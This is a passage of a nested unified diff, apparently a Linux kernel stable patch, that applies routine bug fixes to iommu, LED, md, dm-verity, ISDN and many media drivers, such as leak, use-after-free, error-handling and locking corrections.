+@@ -3698,8 +3702,8 @@ static int intel_iommu_memory_notifier(struct notifier_block *nb,
+ 				       unsigned long val, void *v)
+ {
+ 	struct memory_notify *mhp = v;
+-	unsigned long start_vpfn = mm_to_dma_pfn(mhp->start_pfn);
+-	unsigned long last_vpfn = mm_to_dma_pfn(mhp->start_pfn +
++	unsigned long start_vpfn = mm_to_dma_pfn_start(mhp->start_pfn);
++	unsigned long last_vpfn = mm_to_dma_pfn_end(mhp->start_pfn +
+ 			mhp->nr_pages - 1);
+ 
+ 	switch (val) {
+@@ -4401,7 +4405,7 @@ static void intel_iommu_tlb_sync(struct iommu_domain *domain,
+ 	unsigned long i;
+ 
+ 	nrpages = aligned_nrpages(gather->start, size);
+-	start_pfn = mm_to_dma_pfn(iova_pfn);
++	start_pfn = mm_to_dma_pfn_start(iova_pfn);
+ 
+ 	xa_for_each(&dmar_domain->iommu_array, i, info)
+ 		iommu_flush_iotlb_psi(info->iommu, dmar_domain,
+diff --git a/drivers/iommu/sprd-iommu.c b/drivers/iommu/sprd-iommu.c
+index e4358393fe378..71d22daaec2ed 100644
+--- a/drivers/iommu/sprd-iommu.c
++++ b/drivers/iommu/sprd-iommu.c
+@@ -234,8 +234,8 @@ static void sprd_iommu_cleanup(struct sprd_iommu_domain *dom)
+ 
+ 	pgt_size = sprd_iommu_pgt_size(&dom->domain);
+ 	dma_free_coherent(dom->sdev->dev, pgt_size, dom->pgt_va, dom->pgt_pa);
+-	dom->sdev = NULL;
+ 	sprd_iommu_hw_en(dom->sdev, false);
++	dom->sdev = NULL;
+ }
+ 
+ static void sprd_iommu_domain_free(struct iommu_domain *domain)
+diff --git a/drivers/irqchip/irq-imx-irqsteer.c b/drivers/irqchip/irq-imx-irqsteer.c
+index 96230a04ec238..44ce85c27f57a 100644
+--- a/drivers/irqchip/irq-imx-irqsteer.c
++++ b/drivers/irqchip/irq-imx-irqsteer.c
+@@ -35,6 +35,7 @@ struct irqsteer_data {
+ 	int			channel;
+ 	struct irq_domain	*domain;
+ 	u32			*saved_reg;
++	struct device		*dev;
+ };
+ 
+ static int imx_irqsteer_get_reg_index(struct irqsteer_data *data,
+@@ -71,10 +72,26 @@ static void imx_irqsteer_irq_mask(struct irq_data *d)
+ 	raw_spin_unlock_irqrestore(&data->lock, flags);
+ }
+ 
++static void imx_irqsteer_irq_bus_lock(struct irq_data *d)
++{
++	struct irqsteer_data *data = d->chip_data;
++
++	pm_runtime_get_sync(data->dev);
++}
++
++static void imx_irqsteer_irq_bus_sync_unlock(struct irq_data *d)
++{
++	struct irqsteer_data *data = d->chip_data;
++
++	pm_runtime_put_autosuspend(data->dev);
++}
++
+ static const struct irq_chip imx_irqsteer_irq_chip = {
+-	.name		= "irqsteer",
+-	.irq_mask	= imx_irqsteer_irq_mask,
+-	.irq_unmask	= imx_irqsteer_irq_unmask,
++	.name			= "irqsteer",
++	.irq_mask		= imx_irqsteer_irq_mask,
++	.irq_unmask		= imx_irqsteer_irq_unmask,
++	.irq_bus_lock		= imx_irqsteer_irq_bus_lock,
++	.irq_bus_sync_unlock	= imx_irqsteer_irq_bus_sync_unlock,
+ };
+ 
+ static int imx_irqsteer_irq_map(struct irq_domain *h, unsigned int irq,
+@@ -149,6 +166,7 @@ static int imx_irqsteer_probe(struct platform_device *pdev)
+ 	if (!data)
+ 		return -ENOMEM;
+ 
++	data->dev = &pdev->dev;
+ 	data->regs = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(data->regs)) {
+ 		dev_err(&pdev->dev, "failed to initialize reg\n");
+diff --git a/drivers/isdn/hardware/mISDN/hfcmulti.c b/drivers/isdn/hardware/mISDN/hfcmulti.c
+index e840609c50eb7..2063afffd0853 100644
+--- a/drivers/isdn/hardware/mISDN/hfcmulti.c
++++ b/drivers/isdn/hardware/mISDN/hfcmulti.c
+@@ -1931,7 +1931,7 @@ hfcmulti_dtmf(struct hfc_multi *hc)
+ static void
+ hfcmulti_tx(struct hfc_multi *hc, int ch)
+ {
+-	int i, ii, temp, len = 0;
++	int i, ii, temp, tmp_len, len = 0;
+ 	int Zspace, z1, z2; /* must be int for calculation */
+ 	int Fspace, f1, f2;
+ 	u_char *d;
+@@ -2152,14 +2152,15 @@ hfcmulti_tx(struct hfc_multi *hc, int ch)
+ 		HFC_wait_nodebug(hc);
+ 	}
+ 
++	tmp_len = (*sp)->len;
+ 	dev_kfree_skb(*sp);
+ 	/* check for next frame */
+ 	if (bch && get_next_bframe(bch)) {
+-		len = (*sp)->len;
++		len = tmp_len;
+ 		goto next_frame;
+ 	}
+ 	if (dch && get_next_dframe(dch)) {
+-		len = (*sp)->len;
++		len = tmp_len;
+ 		goto next_frame;
+ 	}
+ 
+diff --git a/drivers/leds/flash/leds-mt6360.c b/drivers/leds/flash/leds-mt6360.c
+index e1066a52d2d21..2fab335a64252 100644
+--- a/drivers/leds/flash/leds-mt6360.c
++++ b/drivers/leds/flash/leds-mt6360.c
+@@ -637,14 +637,17 @@ static int mt6360_init_isnk_properties(struct mt6360_led *led,
+ 
+ 			ret = fwnode_property_read_u32(child, "reg", &reg);
+ 			if (ret || reg > MT6360_LED_ISNK3 ||
+-			    priv->leds_active & BIT(reg))
++			    priv->leds_active & BIT(reg)) {
++				fwnode_handle_put(child);
+ 				return -EINVAL;
++			}
+ 
+ 			ret = fwnode_property_read_u32(child, "color", &color);
+ 			if (ret) {
+ 				dev_err(priv->dev,
+ 					"led %d, no color specified\n",
+ 					led->led_no);
++				fwnode_handle_put(child);
+ 				return ret;
+ 			}
+ 
+diff --git a/drivers/leds/led-class.c b/drivers/leds/led-class.c
+index aa39b2a48fdff..7391d2cf1370a 100644
+--- a/drivers/leds/led-class.c
++++ b/drivers/leds/led-class.c
+@@ -235,7 +235,6 @@ struct led_classdev *of_led_get(struct device_node *np, int index)
+ 
+ 	led_dev = class_find_device_by_of_node(leds_class, led_node);
+ 	of_node_put(led_node);
+-	put_device(led_dev);
+ 
+ 	if (!led_dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/leds/led-triggers.c b/drivers/leds/led-triggers.c
+index 072491d3e17b0..024b73f84ce0c 100644
+--- a/drivers/leds/led-triggers.c
++++ b/drivers/leds/led-triggers.c
+@@ -179,9 +179,9 @@ int led_trigger_set(struct led_classdev *led_cdev, struct led_trigger *trig)
+ 
+ 		cancel_work_sync(&led_cdev->set_brightness_work);
+ 		led_stop_software_blink(led_cdev);
++		device_remove_groups(led_cdev->dev, led_cdev->trigger->groups);
+ 		if (led_cdev->trigger->deactivate)
+ 			led_cdev->trigger->deactivate(led_cdev);
+-		device_remove_groups(led_cdev->dev, led_cdev->trigger->groups);
+ 		led_cdev->trigger = NULL;
+ 		led_cdev->trigger_data = NULL;
+ 		led_cdev->activated = false;
+diff --git a/drivers/leds/leds-ss4200.c b/drivers/leds/leds-ss4200.c
+index fcaa34706b6ca..2ef9fc7371bd1 100644
+--- a/drivers/leds/leds-ss4200.c
++++ b/drivers/leds/leds-ss4200.c
+@@ -356,8 +356,10 @@ static int ich7_lpc_probe(struct pci_dev *dev,
+ 
+ 	nas_gpio_pci_dev = dev;
+ 	status = pci_read_config_dword(dev, PMBASE, &g_pm_io_base);
+-	if (status)
++	if (status) {
++		status = pcibios_err_to_errno(status);
+ 		goto out;
++	}
+ 	g_pm_io_base &= 0x00000ff80;
+ 
+ 	status = pci_read_config_dword(dev, GPIO_CTRL, &gc);
+@@ -369,8 +371,9 @@ static int ich7_lpc_probe(struct pci_dev *dev,
+ 	}
+ 
+ 	status = pci_read_config_dword(dev, GPIO_BASE, &nas_gpio_io_base);
+-	if (0 > status) {
++	if (status) {
+ 		dev_info(&dev->dev, "Unable to read GPIOBASE.\n");
++		status = pcibios_err_to_errno(status);
+ 		goto out;
+ 	}
+ 	dev_dbg(&dev->dev, ": GPIOBASE = 0x%08x\n", nas_gpio_io_base);
+diff --git a/drivers/macintosh/therm_windtunnel.c b/drivers/macintosh/therm_windtunnel.c
+index b8228ca404544..ab9b381c8ff11 100644
+--- a/drivers/macintosh/therm_windtunnel.c
++++ b/drivers/macintosh/therm_windtunnel.c
+@@ -548,7 +548,7 @@ g4fan_exit( void )
+ 	platform_driver_unregister( &therm_of_driver );
+ 
+ 	if( x.of_dev )
+-		of_device_unregister( x.of_dev );
++		of_platform_device_destroy(&x.of_dev->dev, NULL);
+ }
+ 
+ module_init(g4fan_init);
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 6a707b41dc865..52585e2c61aa4 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -1496,14 +1496,6 @@ static int verity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	return r;
+ }
+ 
+-/*
+- * Check whether a DM target is a verity target.
+- */
+-bool dm_is_verity_target(struct dm_target *ti)
+-{
+-	return ti->type->module == THIS_MODULE;
+-}
+-
+ /*
+  * Get the verity mode (error behavior) of a verity target.
+  *
+@@ -1575,6 +1567,14 @@ static void __exit dm_verity_exit(void)
+ module_init(dm_verity_init);
+ module_exit(dm_verity_exit);
+ 
++/*
++ * Check whether a DM target is a verity target.
++ */
++bool dm_is_verity_target(struct dm_target *ti)
++{
++	return ti->type == &verity_target;
++}
++
+ MODULE_AUTHOR("Mikulas Patocka <mpatocka@redhat.com>");
+ MODULE_AUTHOR("Mandeep Baines <msb@chromium.org>");
+ MODULE_AUTHOR("Will Drewry <wad@chromium.org>");
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 506c998c0ca59..7dc1c42accccd 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -527,13 +527,9 @@ static void md_end_flush(struct bio *bio)
+ 
+ 	rdev_dec_pending(rdev, mddev);
+ 
+-	if (atomic_dec_and_test(&mddev->flush_pending)) {
+-		/* The pair is percpu_ref_get() from md_flush_request() */
+-		percpu_ref_put(&mddev->active_io);
+-
++	if (atomic_dec_and_test(&mddev->flush_pending))
+ 		/* The pre-request flush has finished */
+ 		queue_work(md_wq, &mddev->flush_work);
+-	}
+ }
+ 
+ static void md_submit_flush_data(struct work_struct *ws);
+@@ -564,12 +560,8 @@ static void submit_flushes(struct work_struct *ws)
+ 			rcu_read_lock();
+ 		}
+ 	rcu_read_unlock();
+-	if (atomic_dec_and_test(&mddev->flush_pending)) {
+-		/* The pair is percpu_ref_get() from md_flush_request() */
+-		percpu_ref_put(&mddev->active_io);
+-
++	if (atomic_dec_and_test(&mddev->flush_pending))
+ 		queue_work(md_wq, &mddev->flush_work);
+-	}
+ }
+ 
+ static void md_submit_flush_data(struct work_struct *ws)
+@@ -594,8 +586,20 @@ static void md_submit_flush_data(struct work_struct *ws)
+ 		bio_endio(bio);
+ 	} else {
+ 		bio->bi_opf &= ~REQ_PREFLUSH;
+-		md_handle_request(mddev, bio);
++
++		/*
++		 * make_requst() will never return error here, it only
++		 * returns error in raid5_make_request() by dm-raid.
++		 * Since dm always splits data and flush operation into
++		 * two separate io, io size of flush submitted by dm
++		 * always is 0, make_request() will not be called here.
++		 */
++		if (WARN_ON_ONCE(!mddev->pers->make_request(mddev, bio)))
++			bio_io_error(bio);;
+ 	}
++
++	/* The pair is percpu_ref_get() from md_flush_request() */
++	percpu_ref_put(&mddev->active_io);
+ }
+ 
+ /*
+diff --git a/drivers/media/i2c/imx412.c b/drivers/media/i2c/imx412.c
+index 7f6d29e0e7c40..77fa6253ba3e3 100644
+--- a/drivers/media/i2c/imx412.c
++++ b/drivers/media/i2c/imx412.c
+@@ -544,14 +544,13 @@ static int imx412_update_controls(struct imx412 *imx412,
+  */
+ static int imx412_update_exp_gain(struct imx412 *imx412, u32 exposure, u32 gain)
+ {
+-	u32 lpfr, shutter;
++	u32 lpfr;
+ 	int ret;
+ 
+ 	lpfr = imx412->vblank + imx412->cur_mode->height;
+-	shutter = lpfr - exposure;
+ 
+-	dev_dbg(imx412->dev, "Set exp %u, analog gain %u, shutter %u, lpfr %u",
+-		exposure, gain, shutter, lpfr);
++	dev_dbg(imx412->dev, "Set exp %u, analog gain %u, lpfr %u",
++		exposure, gain, lpfr);
+ 
+ 	ret = imx412_write_reg(imx412, IMX412_REG_HOLD, 1, 1);
+ 	if (ret)
+@@ -561,7 +560,7 @@ static int imx412_update_exp_gain(struct imx412 *imx412, u32 exposure, u32 gain)
+ 	if (ret)
+ 		goto error_release_group_hold;
+ 
+-	ret = imx412_write_reg(imx412, IMX412_REG_EXPOSURE_CIT, 2, shutter);
++	ret = imx412_write_reg(imx412, IMX412_REG_EXPOSURE_CIT, 2, exposure);
+ 	if (ret)
+ 		goto error_release_group_hold;
+ 
+diff --git a/drivers/media/pci/ivtv/ivtv-udma.c b/drivers/media/pci/ivtv/ivtv-udma.c
+index 210be8290f24d..fd76f88975ae3 100644
+--- a/drivers/media/pci/ivtv/ivtv-udma.c
++++ b/drivers/media/pci/ivtv/ivtv-udma.c
+@@ -131,6 +131,8 @@ int ivtv_udma_setup(struct ivtv *itv, unsigned long ivtv_dest_addr,
+ 
+ 	/* Fill SG List with new values */
+ 	if (ivtv_udma_fill_sg_list(dma, &user_dma, 0) < 0) {
++		IVTV_DEBUG_WARN("%s: could not allocate bounce buffers for highmem userspace buffers\n",
++				__func__);
+ 		unpin_user_pages(dma->map, dma->page_count);
+ 		dma->page_count = 0;
+ 		return -ENOMEM;
+@@ -139,6 +141,12 @@ int ivtv_udma_setup(struct ivtv *itv, unsigned long ivtv_dest_addr,
+ 	/* Map SG List */
+ 	dma->SG_length = dma_map_sg(&itv->pdev->dev, dma->SGlist,
+ 				    dma->page_count, DMA_TO_DEVICE);
++	if (!dma->SG_length) {
++		IVTV_DEBUG_WARN("%s: DMA map error, SG_length is 0\n", __func__);
++		unpin_user_pages(dma->map, dma->page_count);
++		dma->page_count = 0;
++		return -EINVAL;
++	}
+ 
+ 	/* Fill SG Array with new values */
+ 	ivtv_udma_fill_sg_array (dma, ivtv_dest_addr, 0, -1);
+diff --git a/drivers/media/pci/ivtv/ivtv-yuv.c b/drivers/media/pci/ivtv/ivtv-yuv.c
+index 4ba10c34a16a4..bd0b80331602d 100644
+--- a/drivers/media/pci/ivtv/ivtv-yuv.c
++++ b/drivers/media/pci/ivtv/ivtv-yuv.c
+@@ -115,6 +115,12 @@ static int ivtv_yuv_prep_user_dma(struct ivtv *itv, struct ivtv_user_dma *dma,
+ 	}
+ 	dma->SG_length = dma_map_sg(&itv->pdev->dev, dma->SGlist,
+ 				    dma->page_count, DMA_TO_DEVICE);
++	if (!dma->SG_length) {
++		IVTV_DEBUG_WARN("%s: DMA map error, SG_length is 0\n", __func__);
++		unpin_user_pages(dma->map, dma->page_count);
++		dma->page_count = 0;
++		return -EINVAL;
++	}
+ 
+ 	/* Fill SG Array with new values */
+ 	ivtv_udma_fill_sg_array(dma, y_buffer_offset, uv_buffer_offset, y_size);
+diff --git a/drivers/media/pci/ivtv/ivtvfb.c b/drivers/media/pci/ivtv/ivtvfb.c
+index 00ac94d4ab19d..a642becdc0d73 100644
+--- a/drivers/media/pci/ivtv/ivtvfb.c
++++ b/drivers/media/pci/ivtv/ivtvfb.c
+@@ -281,10 +281,10 @@ static int ivtvfb_prep_dec_dma_to_device(struct ivtv *itv,
+ 	/* Map User DMA */
+ 	if (ivtv_udma_setup(itv, ivtv_dest_addr, userbuf, size_in_bytes) <= 0) {
+ 		mutex_unlock(&itv->udma.lock);
+-		IVTVFB_WARN("ivtvfb_prep_dec_dma_to_device, Error with pin_user_pages: %d bytes, %d pages returned\n",
+-			       size_in_bytes, itv->udma.page_count);
++		IVTVFB_WARN("%s, Error in ivtv_udma_setup: %d bytes, %d pages returned\n",
++			       __func__, size_in_bytes, itv->udma.page_count);
+ 
+-		/* pin_user_pages must have failed completely */
++		/* pin_user_pages or DMA must have failed completely */
+ 		return -EIO;
+ 	}
+ 
+diff --git a/drivers/media/pci/saa7134/saa7134-dvb.c b/drivers/media/pci/saa7134/saa7134-dvb.c
+index 9c6cfef03331d..a66df6adfaad8 100644
+--- a/drivers/media/pci/saa7134/saa7134-dvb.c
++++ b/drivers/media/pci/saa7134/saa7134-dvb.c
+@@ -466,7 +466,9 @@ static int philips_europa_tuner_sleep(struct dvb_frontend *fe)
+ 	/* switch the board to analog mode */
+ 	if (fe->ops.i2c_gate_ctrl)
+ 		fe->ops.i2c_gate_ctrl(fe, 1);
+-	i2c_transfer(&dev->i2c_adap, &analog_msg, 1);
++	if (i2c_transfer(&dev->i2c_adap, &analog_msg, 1) != 1)
++		return -EIO;
++
+ 	return 0;
+ }
+ 
+@@ -1018,7 +1020,9 @@ static int md8800_set_voltage2(struct dvb_frontend *fe,
+ 	else
+ 		wbuf[1] = rbuf & 0xef;
+ 	msg[0].len = 2;
+-	i2c_transfer(&dev->i2c_adap, msg, 1);
++	if (i2c_transfer(&dev->i2c_adap, msg, 1) != 1)
++		return -EIO;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/qcom/venus/vdec.c b/drivers/media/platform/qcom/venus/vdec.c
+index 1a52c2ea2da5b..7ea976efc0242 100644
+--- a/drivers/media/platform/qcom/venus/vdec.c
++++ b/drivers/media/platform/qcom/venus/vdec.c
+@@ -1221,7 +1221,7 @@ static int vdec_stop_output(struct venus_inst *inst)
+ 		break;
+ 	case VENUS_DEC_STATE_INIT:
+ 	case VENUS_DEC_STATE_CAPTURE_SETUP:
+-		ret = hfi_session_flush(inst, HFI_FLUSH_INPUT, true);
++		ret = hfi_session_flush(inst, HFI_FLUSH_ALL, true);
+ 		break;
+ 	default:
+ 		break;
+@@ -1705,6 +1705,7 @@ static int vdec_close(struct file *file)
+ 
+ 	vdec_pm_get(inst);
+ 
++	cancel_work_sync(&inst->delayed_process_work);
+ 	v4l2_m2m_ctx_release(inst->m2m_ctx);
+ 	v4l2_m2m_release(inst->m2m_dev);
+ 	vdec_ctrl_deinit(inst);
+diff --git a/drivers/media/platform/renesas/rcar-vin/rcar-csi2.c b/drivers/media/platform/renesas/rcar-vin/rcar-csi2.c
+index 174aa6176f540..3b6657d4877a5 100644
+--- a/drivers/media/platform/renesas/rcar-vin/rcar-csi2.c
++++ b/drivers/media/platform/renesas/rcar-vin/rcar-csi2.c
+@@ -1559,12 +1559,14 @@ static int rcsi2_probe(struct platform_device *pdev)
+ 
+ 	ret = v4l2_async_register_subdev(&priv->subdev);
+ 	if (ret < 0)
+-		goto error_async;
++		goto error_pm_runtime;
+ 
+ 	dev_info(priv->dev, "%d lanes found\n", priv->lanes);
+ 
+ 	return 0;
+ 
++error_pm_runtime:
++	pm_runtime_disable(&pdev->dev);
+ error_async:
+ 	v4l2_async_nf_unregister(&priv->notifier);
+ 	v4l2_async_nf_cleanup(&priv->notifier);
+@@ -1581,6 +1583,7 @@ static int rcsi2_remove(struct platform_device *pdev)
+ 	v4l2_async_nf_unregister(&priv->notifier);
+ 	v4l2_async_nf_cleanup(&priv->notifier);
+ 	v4l2_async_unregister_subdev(&priv->subdev);
++	v4l2_subdev_cleanup(&priv->subdev);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 
+diff --git a/drivers/media/platform/renesas/rcar-vin/rcar-dma.c b/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
+index ef5adffae1972..8bfb020b2f260 100644
+--- a/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
++++ b/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
+@@ -665,12 +665,22 @@ static int rvin_setup(struct rvin_dev *vin)
+ 	 */
+ 	switch (vin->mbus_code) {
+ 	case MEDIA_BUS_FMT_YUYV8_1X16:
+-		/* BT.601/BT.1358 16bit YCbCr422 */
+-		vnmc |= VNMC_INF_YUV16;
++		if (vin->is_csi)
++			/* YCbCr422 8-bit */
++			vnmc |= VNMC_INF_YUV8_BT601;
++		else
++			/* BT.601/BT.1358 16bit YCbCr422 */
++			vnmc |= VNMC_INF_YUV16;
+ 		input_is_yuv = true;
+ 		break;
+ 	case MEDIA_BUS_FMT_UYVY8_1X16:
+-		vnmc |= VNMC_INF_YUV16 | VNMC_YCAL;
++		if (vin->is_csi)
++			/* YCbCr422 8-bit */
++			vnmc |= VNMC_INF_YUV8_BT601;
++		else
++			/* BT.601/BT.1358 16bit YCbCr422 */
++			vnmc |= VNMC_INF_YUV16;
++		vnmc |= VNMC_YCAL;
+ 		input_is_yuv = true;
+ 		break;
+ 	case MEDIA_BUS_FMT_UYVY8_2X8:
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_histo.c b/drivers/media/platform/renesas/vsp1/vsp1_histo.c
+index f22449dd654cb..c0f1002f4ecf1 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_histo.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_histo.c
+@@ -36,9 +36,8 @@ struct vsp1_histogram_buffer *
+ vsp1_histogram_buffer_get(struct vsp1_histogram *histo)
+ {
+ 	struct vsp1_histogram_buffer *buf = NULL;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&histo->irqlock, flags);
++	spin_lock(&histo->irqlock);
+ 
+ 	if (list_empty(&histo->irqqueue))
+ 		goto done;
+@@ -49,7 +48,7 @@ vsp1_histogram_buffer_get(struct vsp1_histogram *histo)
+ 	histo->readout = true;
+ 
+ done:
+-	spin_unlock_irqrestore(&histo->irqlock, flags);
++	spin_unlock(&histo->irqlock);
+ 	return buf;
+ }
+ 
+@@ -58,7 +57,6 @@ void vsp1_histogram_buffer_complete(struct vsp1_histogram *histo,
+ 				    size_t size)
+ {
+ 	struct vsp1_pipeline *pipe = histo->entity.pipe;
+-	unsigned long flags;
+ 
+ 	/*
+ 	 * The pipeline pointer is guaranteed to be valid as this function is
+@@ -70,10 +68,10 @@ void vsp1_histogram_buffer_complete(struct vsp1_histogram *histo,
+ 	vb2_set_plane_payload(&buf->buf.vb2_buf, 0, size);
+ 	vb2_buffer_done(&buf->buf.vb2_buf, VB2_BUF_STATE_DONE);
+ 
+-	spin_lock_irqsave(&histo->irqlock, flags);
++	spin_lock(&histo->irqlock);
+ 	histo->readout = false;
+ 	wake_up(&histo->wait_queue);
+-	spin_unlock_irqrestore(&histo->irqlock, flags);
++	spin_unlock(&histo->irqlock);
+ }
+ 
+ /* -----------------------------------------------------------------------------
+@@ -124,11 +122,10 @@ static void histo_buffer_queue(struct vb2_buffer *vb)
+ 	struct vb2_v4l2_buffer *vbuf = to_vb2_v4l2_buffer(vb);
+ 	struct vsp1_histogram *histo = vb2_get_drv_priv(vb->vb2_queue);
+ 	struct vsp1_histogram_buffer *buf = to_vsp1_histogram_buffer(vbuf);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&histo->irqlock, flags);
++	spin_lock_irq(&histo->irqlock);
+ 	list_add_tail(&buf->queue, &histo->irqqueue);
+-	spin_unlock_irqrestore(&histo->irqlock, flags);
++	spin_unlock_irq(&histo->irqlock);
+ }
+ 
+ static int histo_start_streaming(struct vb2_queue *vq, unsigned int count)
+@@ -140,9 +137,8 @@ static void histo_stop_streaming(struct vb2_queue *vq)
+ {
+ 	struct vsp1_histogram *histo = vb2_get_drv_priv(vq);
+ 	struct vsp1_histogram_buffer *buffer;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&histo->irqlock, flags);
++	spin_lock_irq(&histo->irqlock);
+ 
+ 	/* Remove all buffers from the IRQ queue. */
+ 	list_for_each_entry(buffer, &histo->irqqueue, queue)
+@@ -152,7 +148,7 @@ static void histo_stop_streaming(struct vb2_queue *vq)
+ 	/* Wait for the buffer being read out (if any) to complete. */
+ 	wait_event_lock_irq(histo->wait_queue, !histo->readout, histo->irqlock);
+ 
+-	spin_unlock_irqrestore(&histo->irqlock, flags);
++	spin_unlock_irq(&histo->irqlock);
+ }
+ 
+ static const struct vb2_ops histo_video_queue_qops = {
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_pipe.h b/drivers/media/platform/renesas/vsp1/vsp1_pipe.h
+index ae646c9ef3373..15daf35bda216 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_pipe.h
++++ b/drivers/media/platform/renesas/vsp1/vsp1_pipe.h
+@@ -73,7 +73,7 @@ struct vsp1_partition_window {
+  * @wpf: The WPF partition window configuration
+  */
+ struct vsp1_partition {
+-	struct vsp1_partition_window rpf;
++	struct vsp1_partition_window rpf[VSP1_MAX_RPF];
+ 	struct vsp1_partition_window uds_sink;
+ 	struct vsp1_partition_window uds_source;
+ 	struct vsp1_partition_window sru;
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_rpf.c b/drivers/media/platform/renesas/vsp1/vsp1_rpf.c
+index 75083cb234fe3..996a3058d5b76 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_rpf.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_rpf.c
+@@ -271,8 +271,8 @@ static void rpf_configure_partition(struct vsp1_entity *entity,
+ 	 * 'width' need to be adjusted.
+ 	 */
+ 	if (pipe->partitions > 1) {
+-		crop.width = pipe->partition->rpf.width;
+-		crop.left += pipe->partition->rpf.left;
++		crop.width = pipe->partition->rpf[rpf->entity.index].width;
++		crop.left += pipe->partition->rpf[rpf->entity.index].left;
+ 	}
+ 
+ 	if (pipe->interlaced) {
+@@ -327,7 +327,9 @@ static void rpf_partition(struct vsp1_entity *entity,
+ 			  unsigned int partition_idx,
+ 			  struct vsp1_partition_window *window)
+ {
+-	partition->rpf = *window;
++	struct vsp1_rwpf *rpf = to_rwpf(&entity->subdev);
++
++	partition->rpf[rpf->entity.index] = *window;
+ }
+ 
+ static const struct vsp1_entity_operations rpf_entity_ops = {
+diff --git a/drivers/media/rc/imon.c b/drivers/media/rc/imon.c
+index 5719dda6e0f0e..e5590a708f1c5 100644
+--- a/drivers/media/rc/imon.c
++++ b/drivers/media/rc/imon.c
+@@ -1148,10 +1148,7 @@ static int imon_ir_change_protocol(struct rc_dev *rc, u64 *rc_proto)
+ 
+ 	memcpy(ictx->usb_tx_buf, &ir_proto_packet, sizeof(ir_proto_packet));
+ 
+-	if (!mutex_is_locked(&ictx->lock)) {
+-		unlock = true;
+-		mutex_lock(&ictx->lock);
+-	}
++	unlock = mutex_trylock(&ictx->lock);
+ 
+ 	retval = send_packet(ictx);
+ 	if (retval)
+diff --git a/drivers/media/rc/lirc_dev.c b/drivers/media/rc/lirc_dev.c
+index adb8c794a2d7b..d9a9017b96eaa 100644
+--- a/drivers/media/rc/lirc_dev.c
++++ b/drivers/media/rc/lirc_dev.c
+@@ -828,8 +828,10 @@ struct rc_dev *rc_dev_get_from_fd(int fd, bool write)
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 
+-	if (write && !(f.file->f_mode & FMODE_WRITE))
++	if (write && !(f.file->f_mode & FMODE_WRITE)) {
++		fdput(f);
+ 		return ERR_PTR(-EPERM);
++	}
+ 
+ 	fh = f.file->private_data;
+ 	dev = fh->rc;
+diff --git a/drivers/media/usb/dvb-usb/dvb-usb-init.c b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+index 58eea8ab54779..6cf6d08cc4ec9 100644
+--- a/drivers/media/usb/dvb-usb/dvb-usb-init.c
++++ b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+@@ -23,11 +23,40 @@ static int dvb_usb_force_pid_filter_usage;
+ module_param_named(force_pid_filter_usage, dvb_usb_force_pid_filter_usage, int, 0444);
+ MODULE_PARM_DESC(force_pid_filter_usage, "force all dvb-usb-devices to use a PID filter, if any (default: 0).");
+ 
++static int dvb_usb_check_bulk_endpoint(struct dvb_usb_device *d, u8 endpoint)
++{
++	if (endpoint) {
++		int ret;
++
++		ret = usb_pipe_type_check(d->udev, usb_sndbulkpipe(d->udev, endpoint));
++		if (ret)
++			return ret;
++		ret = usb_pipe_type_check(d->udev, usb_rcvbulkpipe(d->udev, endpoint));
++		if (ret)
++			return ret;
++	}
++	return 0;
++}
++
++static void dvb_usb_clear_halt(struct dvb_usb_device *d, u8 endpoint)
++{
++	if (endpoint) {
++		usb_clear_halt(d->udev, usb_sndbulkpipe(d->udev, endpoint));
++		usb_clear_halt(d->udev, usb_rcvbulkpipe(d->udev, endpoint));
++	}
++}
++
+ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ {
+ 	struct dvb_usb_adapter *adap;
+ 	int ret, n, o;
+ 
++	ret = dvb_usb_check_bulk_endpoint(d, d->props.generic_bulk_ctrl_endpoint);
++	if (ret)
++		return ret;
++	ret = dvb_usb_check_bulk_endpoint(d, d->props.generic_bulk_ctrl_endpoint_response);
++	if (ret)
++		return ret;
+ 	for (n = 0; n < d->props.num_adapters; n++) {
+ 		adap = &d->adapter[n];
+ 		adap->dev = d;
+@@ -103,10 +132,8 @@ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ 	 * when reloading the driver w/o replugging the device
+ 	 * sometimes a timeout occurs, this helps
+ 	 */
+-	if (d->props.generic_bulk_ctrl_endpoint != 0) {
+-		usb_clear_halt(d->udev, usb_sndbulkpipe(d->udev, d->props.generic_bulk_ctrl_endpoint));
+-		usb_clear_halt(d->udev, usb_rcvbulkpipe(d->udev, d->props.generic_bulk_ctrl_endpoint));
+-	}
++	dvb_usb_clear_halt(d, d->props.generic_bulk_ctrl_endpoint);
++	dvb_usb_clear_halt(d, d->props.generic_bulk_ctrl_endpoint_response);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index 6d7535efc09de..dffc9d03235c4 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
